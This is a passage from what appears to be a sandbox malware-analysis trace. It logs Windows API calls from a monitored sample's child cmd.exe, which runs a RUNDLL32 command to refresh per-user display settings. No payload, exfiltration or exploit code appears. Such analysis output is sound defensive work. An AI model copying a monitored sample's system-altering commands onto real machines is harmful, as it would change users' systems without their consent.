0x460000 [0039.882] GetProcessHeap () returned 0x460000 [0039.882] HeapValidate (hHeap=0x460000, dwFlags=0x0, lpMem=0x475850) returned 1 [0039.882] GetProcessHeap () returned 0x460000 [0039.882] RtlSizeHeap (HeapHandle=0x460000, Flags=0x0, MemoryPointer=0x475850) returned 0x4a [0039.882] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x475850 | out: hHeap=0x460000) returned 1 [0039.882] GetProcessHeap () returned 0x460000 [0039.882] GetProcessHeap () returned 0x460000 [0039.882] HeapValidate (hHeap=0x460000, dwFlags=0x0, lpMem=0x474d10) returned 1 [0039.882] GetProcessHeap () returned 0x460000 [0039.882] RtlSizeHeap (HeapHandle=0x460000, Flags=0x0, MemoryPointer=0x474d10) returned 0x14 [0039.883] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x474d10 | out: hHeap=0x460000) returned 1 [0039.883] GetProcessHeap () returned 0x460000 [0039.883] GetProcessHeap () returned 0x460000 [0039.883] HeapValidate (hHeap=0x460000, dwFlags=0x0, lpMem=0x4756a8) returned 1 [0039.883] GetProcessHeap () returned 0x460000 [0039.883] RtlSizeHeap (HeapHandle=0x460000, Flags=0x0, MemoryPointer=0x4756a8) returned 0x8 [0039.883] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4756a8 | out: hHeap=0x460000) returned 1 [0039.883] GetProcessHeap () returned 0x460000 [0039.883] GetProcessHeap () returned 0x460000 [0039.883] HeapValidate (hHeap=0x460000, dwFlags=0x0, lpMem=0x474d30) returned 1 [0039.883] GetProcessHeap () returned 0x460000 [0039.883] RtlSizeHeap (HeapHandle=0x460000, Flags=0x0, MemoryPointer=0x474d30) returned 0x14 [0039.883] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x474d30 | out: hHeap=0x460000) returned 1 [0039.883] GetProcessHeap () returned 0x460000 [0039.883] GetProcessHeap () returned 0x460000 [0039.883] HeapValidate (hHeap=0x460000, dwFlags=0x0, lpMem=0x474d50) returned 1 [0039.883] GetProcessHeap () returned 0x460000 [0039.883] RtlSizeHeap (HeapHandle=0x460000, Flags=0x0, MemoryPointer=0x474d50) returned 0x14 [0039.883] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x474d50 | out: hHeap=0x460000) returned 1 [0039.883] GetProcessHeap () returned 0x460000 [0039.884] GetProcessHeap () returned 0x460000 [0039.884] HeapValidate (hHeap=0x460000, dwFlags=0x0, lpMem=0x46f0f8) returned 1 [0039.884] GetProcessHeap () returned 0x460000 [0039.884] RtlSizeHeap (HeapHandle=0x460000, Flags=0x0, MemoryPointer=0x46f0f8) returned 0x10 [0039.884] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x46f0f8 | out: hHeap=0x460000) returned 1 [0039.884] GetProcessHeap () returned 0x460000 [0039.884] GetProcessHeap () returned 0x460000 [0039.884] HeapValidate (hHeap=0x460000, dwFlags=0x0, lpMem=0x474d70) returned 1 [0039.884] GetProcessHeap () returned 0x460000 [0039.884] RtlSizeHeap (HeapHandle=0x460000, Flags=0x0, MemoryPointer=0x474d70) returned 0x14 [0039.884] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x474d70 | out: hHeap=0x460000) returned 1 [0039.884] GetProcessHeap () returned 0x460000 [0039.884] GetProcessHeap () returned 0x460000 [0039.884] HeapValidate (hHeap=0x460000, dwFlags=0x0, lpMem=0x474d90) returned 1 [0039.884] GetProcessHeap () returned 0x460000 [0039.884] RtlSizeHeap (HeapHandle=0x460000, Flags=0x0, MemoryPointer=0x474d90) returned 0x14 [0039.884] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x474d90 | out: hHeap=0x460000) returned 1 [0039.884] GetProcessHeap () returned 0x460000 [0039.884] GetProcessHeap () returned 0x460000 [0039.884] HeapValidate (hHeap=0x460000, dwFlags=0x0, lpMem=0x474db0) returned 1 [0039.884] GetProcessHeap () returned 0x460000 [0039.884] RtlSizeHeap (HeapHandle=0x460000, Flags=0x0, MemoryPointer=0x474db0) returned 0x14 [0039.884] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x474db0 | out: hHeap=0x460000) returned 1 [0039.884] GetProcessHeap () returned 0x460000 [0039.884] GetProcessHeap () returned 0x460000 [0039.884] HeapValidate (hHeap=0x460000, dwFlags=0x0, lpMem=0x474dd0) returned 1 [0039.884] GetProcessHeap () returned 0x460000 [0039.884] RtlSizeHeap (HeapHandle=0x460000, Flags=0x0, MemoryPointer=0x474dd0) returned 0x14 [0039.885] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x474dd0 | out: hHeap=0x460000) returned 1 [0039.885] GetProcessHeap () returned 0x460000 [0039.885] GetProcessHeap () returned 0x460000 [0039.885] HeapValidate (hHeap=0x460000, dwFlags=0x0, lpMem=0x46f110) returned 1 [0039.885] GetProcessHeap () returned 0x460000 [0039.885] RtlSizeHeap (HeapHandle=0x460000, Flags=0x0, MemoryPointer=0x46f110) returned 0x10 [0039.885] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x46f110 | out: hHeap=0x460000) returned 1 [0039.885] GetProcessHeap () returned 0x460000 [0039.885] GetProcessHeap () returned 0x460000 [0039.885] HeapValidate (hHeap=0x460000, dwFlags=0x0, lpMem=0x474df0) returned 1 [0039.885] GetProcessHeap () returned 0x460000 [0039.885] RtlSizeHeap (HeapHandle=0x460000, Flags=0x0, MemoryPointer=0x474df0) returned 0x14 [0039.885] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x474df0 | out: hHeap=0x460000) returned 1 [0039.885] GetProcessHeap () returned 0x460000 [0039.885] GetProcessHeap () returned 0x460000 [0039.885] HeapValidate (hHeap=0x460000, dwFlags=0x0, lpMem=0x474e50) returned 1 [0039.885] GetProcessHeap () returned 0x460000 [0039.885] RtlSizeHeap (HeapHandle=0x460000, Flags=0x0, MemoryPointer=0x474e50) returned 0x14 [0039.885] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x474e50 | out: hHeap=0x460000) returned 1 [0039.885] GetProcessHeap () returned 0x460000 [0039.885] GetProcessHeap () returned 0x460000 [0039.885] HeapValidate (hHeap=0x460000, dwFlags=0x0, lpMem=0x474ec8) returned 1 [0039.885] GetProcessHeap () returned 0x460000 [0039.885] RtlSizeHeap (HeapHandle=0x460000, Flags=0x0, MemoryPointer=0x474ec8) returned 0x14 [0039.885] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x474ec8 | out: hHeap=0x460000) returned 1 [0039.885] GetProcessHeap () returned 0x460000 [0039.885] GetProcessHeap () returned 0x460000 [0039.885] HeapValidate (hHeap=0x460000, dwFlags=0x0, lpMem=0x46f128) returned 1 [0039.886] GetProcessHeap () returned 0x460000 [0039.886] RtlSizeHeap (HeapHandle=0x460000, Flags=0x0, MemoryPointer=0x46f128) returned 0x10 [0039.886] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x46f128 | out: hHeap=0x460000) returned 1 [0039.886] GetProcessHeap () returned 0x460000 [0039.886] GetProcessHeap () returned 0x460000 [0039.886] HeapValidate (hHeap=0x460000, dwFlags=0x0, lpMem=0x474e88) returned 1 [0039.886] GetProcessHeap () returned 0x460000 [0039.886] RtlSizeHeap (HeapHandle=0x460000, Flags=0x0, MemoryPointer=0x474e88) returned 0x14 [0039.886] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x474e88 | out: hHeap=0x460000) returned 1 [0039.886] GetProcessHeap () returned 0x460000 [0039.886] GetProcessHeap () returned 0x460000 [0039.886] HeapValidate (hHeap=0x460000, dwFlags=0x0, lpMem=0x46f0e0) returned 1 [0039.886] GetProcessHeap () returned 0x460000 [0039.886] RtlSizeHeap (HeapHandle=0x460000, Flags=0x0, MemoryPointer=0x46f0e0) returned 0x10 [0039.886] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x46f0e0 | out: hHeap=0x460000) returned 1 [0039.886] exit (_Code=0) Process: id = "9" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x4b8a3000" os_pid = "0x564" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x314" cmd_line = "C:\\Windows\\system32\\cmd.exe /c RUNDLL32.EXE USER32.DLL,UpdatePerUserSystemParameters 1, True" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 9 os_tid = 0x2a8 [0040.004] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2cf8e4 | out: lpSystemTimeAsFileTime=0x2cf8e4*(dwLowDateTime=0xfe80a260, dwHighDateTime=0x1d623ff)) [0040.004] GetCurrentProcessId () returned 0x564 [0040.004] GetCurrentThreadId () returned 0x2a8 [0040.004] GetTickCount () returned 0x114535e [0040.004] QueryPerformanceCounter (in: lpPerformanceCount=0x2cf8dc | out: lpPerformanceCount=0x2cf8dc*=16013792234) returned 1 [0040.006] GetModuleHandleA (lpModuleName=0x0) returned 0x4a8b0000 [0040.006] __set_app_type (_Type=0x1) [0040.006] __p__fmode () returned 0x770331f4 [0040.006] __p__commode () returned 0x770331fc [0040.007] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a8d21a6) returned 0x0 [0040.007] __getmainargs (in: _Argc=0x4a8d4238, _Argv=0x4a8d4240, _Env=0x4a8d423c, _DoWildCard=0, _StartInfo=0x4a8d4140 | out: _Argc=0x4a8d4238, _Argv=0x4a8d4240, _Env=0x4a8d423c) returned 0 [0040.007] GetCurrentThreadId () returned 0x2a8 [0040.007] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x2a8) returned 0x60 [0040.007] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0040.007] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0040.008] SetThreadUILanguage (LangId=0x0) returned 0x409 [0040.008] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0040.008] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2cf874 | out: phkResult=0x2cf874*=0x0) returned 0x2 [0040.008] VirtualQuery (in: lpAddress=0x2cf8ab, lpBuffer=0x2cf844, dwLength=0x1c | out: lpBuffer=0x2cf844*(BaseAddress=0x2cf000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0040.009] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x2cf844, dwLength=0x1c | out: lpBuffer=0x2cf844*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0040.009] VirtualQuery (in: lpAddress=0x1d1000, lpBuffer=0x2cf844, dwLength=0x1c | out: lpBuffer=0x2cf844*(BaseAddress=0x1d1000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0040.009] VirtualQuery (in: lpAddress=0x1d3000, lpBuffer=0x2cf844, dwLength=0x1c | out: lpBuffer=0x2cf844*(BaseAddress=0x1d3000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0040.009] VirtualQuery (in: lpAddress=0x2d0000, lpBuffer=0x2cf844, dwLength=0x1c | out: lpBuffer=0x2cf844*(BaseAddress=0x2d0000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0xc0000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0040.009] GetConsoleOutputCP () returned 0x1b5 [0040.009] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a8d4260 | out: lpCPInfo=0x4a8d4260) returned 1 [0040.009] SetConsoleCtrlHandler (HandlerRoutine=0x4a8ce72a, Add=1) returned 1 [0040.009] _get_osfhandle (_FileHandle=1) returned 0x7 [0040.009] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0040.009] _get_osfhandle (_FileHandle=1) returned 0x7 [0040.010] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a8d41ac | out: lpMode=0x4a8d41ac) returned 1 [0040.010] _get_osfhandle (_FileHandle=1) returned 0x7 [0040.010] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0040.010] _get_osfhandle (_FileHandle=0) returned 0x3 [0040.010] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a8d41b0 | out: lpMode=0x4a8d41b0) returned 1 [0040.010] GetEnvironmentStringsW () returned 0x4e20d0* [0040.011] GetProcessHeap () returned 0x4d0000 [0040.011] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0xaca) returned 0x4e2ba8 [0040.011] FreeEnvironmentStringsW (penv=0x4e20d0) returned 1 [0040.011] GetProcessHeap () returned 0x4d0000 [0040.011] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x4) returned 0x4e1870 [0040.011] GetEnvironmentStringsW () returned 0x4e20d0* [0040.011] GetProcessHeap () returned 0x4d0000 [0040.011] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0xaca) returned 0x4e3680 [0040.011] FreeEnvironmentStringsW (penv=0x4e20d0) returned 1 [0040.011] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ce7e4 | out: phkResult=0x2ce7e4*=0x68) returned 0x0 [0040.012] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ce7ec, lpData=0x2ce7f0, lpcbData=0x2ce7e8*=0x1000 | out: lpType=0x2ce7ec*=0x0, lpData=0x2ce7f0*=0x0, lpcbData=0x2ce7e8*=0x1000) returned 0x2 [0040.012] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ce7ec, lpData=0x2ce7f0, lpcbData=0x2ce7e8*=0x1000 | out: lpType=0x2ce7ec*=0x4, lpData=0x2ce7f0*=0x1, lpcbData=0x2ce7e8*=0x4) returned 0x0 [0040.012] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ce7ec, lpData=0x2ce7f0, lpcbData=0x2ce7e8*=0x1000 | out: lpType=0x2ce7ec*=0x0, lpData=0x2ce7f0*=0x1, lpcbData=0x2ce7e8*=0x1000) returned 0x2 [0040.012] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ce7ec, lpData=0x2ce7f0, lpcbData=0x2ce7e8*=0x1000 | out: lpType=0x2ce7ec*=0x4, lpData=0x2ce7f0*=0x0, lpcbData=0x2ce7e8*=0x4) returned 0x0 [0040.012] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ce7ec, lpData=0x2ce7f0, lpcbData=0x2ce7e8*=0x1000 | out: lpType=0x2ce7ec*=0x4, lpData=0x2ce7f0*=0x40, lpcbData=0x2ce7e8*=0x4) returned 0x0 [0040.012] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ce7ec, lpData=0x2ce7f0, lpcbData=0x2ce7e8*=0x1000 | out: lpType=0x2ce7ec*=0x4, lpData=0x2ce7f0*=0x40, lpcbData=0x2ce7e8*=0x4) returned 0x0 [0040.012] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ce7ec, lpData=0x2ce7f0, lpcbData=0x2ce7e8*=0x1000 | out: lpType=0x2ce7ec*=0x0, lpData=0x2ce7f0*=0x40, lpcbData=0x2ce7e8*=0x1000) returned 0x2 [0040.012] RegCloseKey (hKey=0x68) returned 0x0 [0040.012] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ce7e4 | out: phkResult=0x2ce7e4*=0x68) returned 0x0 [0040.012] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ce7ec, lpData=0x2ce7f0, lpcbData=0x2ce7e8*=0x1000 | out: lpType=0x2ce7ec*=0x0, lpData=0x2ce7f0*=0x40, lpcbData=0x2ce7e8*=0x1000) returned 0x2 [0040.012] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ce7ec, lpData=0x2ce7f0, lpcbData=0x2ce7e8*=0x1000 | out: lpType=0x2ce7ec*=0x4, lpData=0x2ce7f0*=0x1, lpcbData=0x2ce7e8*=0x4) returned 0x0 [0040.012] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ce7ec, lpData=0x2ce7f0, lpcbData=0x2ce7e8*=0x1000 | out: lpType=0x2ce7ec*=0x0, lpData=0x2ce7f0*=0x1, lpcbData=0x2ce7e8*=0x1000) returned 0x2 [0040.012] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ce7ec, lpData=0x2ce7f0, lpcbData=0x2ce7e8*=0x1000 | out: lpType=0x2ce7ec*=0x4, lpData=0x2ce7f0*=0x0, lpcbData=0x2ce7e8*=0x4) returned 0x0 [0040.012] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ce7ec, lpData=0x2ce7f0, lpcbData=0x2ce7e8*=0x1000 | out: lpType=0x2ce7ec*=0x4, lpData=0x2ce7f0*=0x9, lpcbData=0x2ce7e8*=0x4) returned 0x0 [0040.013] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ce7ec, lpData=0x2ce7f0, lpcbData=0x2ce7e8*=0x1000 | out: lpType=0x2ce7ec*=0x4, lpData=0x2ce7f0*=0x9, lpcbData=0x2ce7e8*=0x4) returned 0x0 [0040.013] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ce7ec, lpData=0x2ce7f0, lpcbData=0x2ce7e8*=0x1000 | out: lpType=0x2ce7ec*=0x0, lpData=0x2ce7f0*=0x9, lpcbData=0x2ce7e8*=0x1000) returned 0x2 [0040.013] RegCloseKey (hKey=0x68) returned 0x0 [0040.013] time (in: timer=0x0 | out: timer=0x0) returned 0x5eb34b60 [0040.013] srand (_Seed=0x5eb34b60) [0040.013] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c RUNDLL32.EXE USER32.DLL,UpdatePerUserSystemParameters 1, True" [0040.013] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c RUNDLL32.EXE USER32.DLL,UpdatePerUserSystemParameters 1, True" [0040.013] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a8d5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0040.013] GetProcessHeap () returned 0x4d0000 [0040.013] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x210) returned 0x4e20d0 [0040.013] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4e20d8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0040.014] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a8e0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0040.014] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a8e0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0040.014] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a8e0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0040.014] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0040.014] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0040.014] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0040.014] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0040.014] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0040.014] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0040.014] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0040.014] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0040.014] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0040.014] GetProcessHeap () returned 0x4d0000 [0040.014] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4e2ba8 | out: hHeap=0x4d0000) returned 1 [0040.014] GetEnvironmentStringsW () returned 0x4e22e8* [0040.014] GetProcessHeap () returned 0x4d0000 [0040.014] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0xae2) returned 0x4e4c48 [0040.015] FreeEnvironmentStringsW (penv=0x4e22e8) returned 1 [0040.015] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a8e0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0040.015] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a8e0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0040.015] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0040.015] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0040.015] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0040.015] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0040.015] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0040.015] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0040.015] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0040.015] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0040.015] GetProcessHeap () returned 0x4d0000 [0040.015] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x54) returned 0x4e17a0 [0040.015] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2cf5b0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0040.015] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x2cf5b0, lpFilePart=0x2cf5ac | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x2cf5ac*="Desktop") returned 0x25 [0040.015] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0040.016] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2cf32c | out: lpFindFileData=0x2cf32c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x4e5738 [0040.016] FindClose (in: hFindFile=0x4e5738 | out: hFindFile=0x4e5738) returned 1 [0040.016] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x2cf32c | out: lpFindFileData=0x2cf32c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xfe3b9a80, ftLastAccessTime.dwHighDateTime=0x1d623ff, ftLastWriteTime.dwLowDateTime=0xfe3b9a80, ftLastWriteTime.dwHighDateTime=0x1d623ff, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x4e5738 [0040.016] FindClose (in: hFindFile=0x4e5738 | out: hFindFile=0x4e5738) returned 1 [0040.016] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0040.016] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x2cf32c | out: lpFindFileData=0x2cf32c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xf5c21be0, ftLastAccessTime.dwHighDateTime=0x1d623ff, ftLastWriteTime.dwLowDateTime=0xf5c21be0, ftLastWriteTime.dwHighDateTime=0x1d623ff, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x4e5738 [0040.016] FindClose (in: hFindFile=0x4e5738 | out: hFindFile=0x4e5738) returned 1 [0040.016] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0040.016] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0040.017] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0040.017] GetProcessHeap () returned 0x4d0000 [0040.017] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4e4c48 | out: hHeap=0x4d0000) returned 1 [0040.017] GetEnvironmentStringsW () returned 0x4e4158* [0040.017] GetProcessHeap () returned 0x4d0000 [0040.017] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0xb36) returned 0x4e5f78 [0040.017] FreeEnvironmentStringsW (penv=0x4e4158) returned 1 [0040.017] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a8d5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0040.017] GetProcessHeap () returned 0x4d0000 [0040.017] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4e17a0 | out: hHeap=0x4d0000) returned 1 [0040.017] GetProcessHeap () returned 0x4d0000 [0040.017] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x400e) returned 0x4e6ab8 [0040.018] GetProcessHeap () returned 0x4d0000 [0040.018] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x88) returned 0x4e2e28 [0040.018] GetProcessHeap () returned 0x4d0000 [0040.018] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4e6ab8 | out: hHeap=0x4d0000) returned 1 [0040.018] GetConsoleOutputCP () returned 0x1b5 [0040.030] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a8d4260 | out: lpCPInfo=0x4a8d4260) returned 1 [0040.030] GetUserDefaultLCID () returned 0x409 [0040.031] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a8d4950, cchData=8 | out: lpLCData=":") returned 2 [0040.032] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2cf6f0, cchData=128 | out: lpLCData="0") returned 2 [0040.032] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2cf6f0, cchData=128 | out: lpLCData="0") returned 2 [0040.032] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2cf6f0, cchData=128 | out: lpLCData="1") returned 2 [0040.032] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a8d4940, cchData=8 | out: lpLCData="/") returned 2 [0040.032] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a8d4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0040.032] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a8d4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0040.032] GetLocaleInfoW 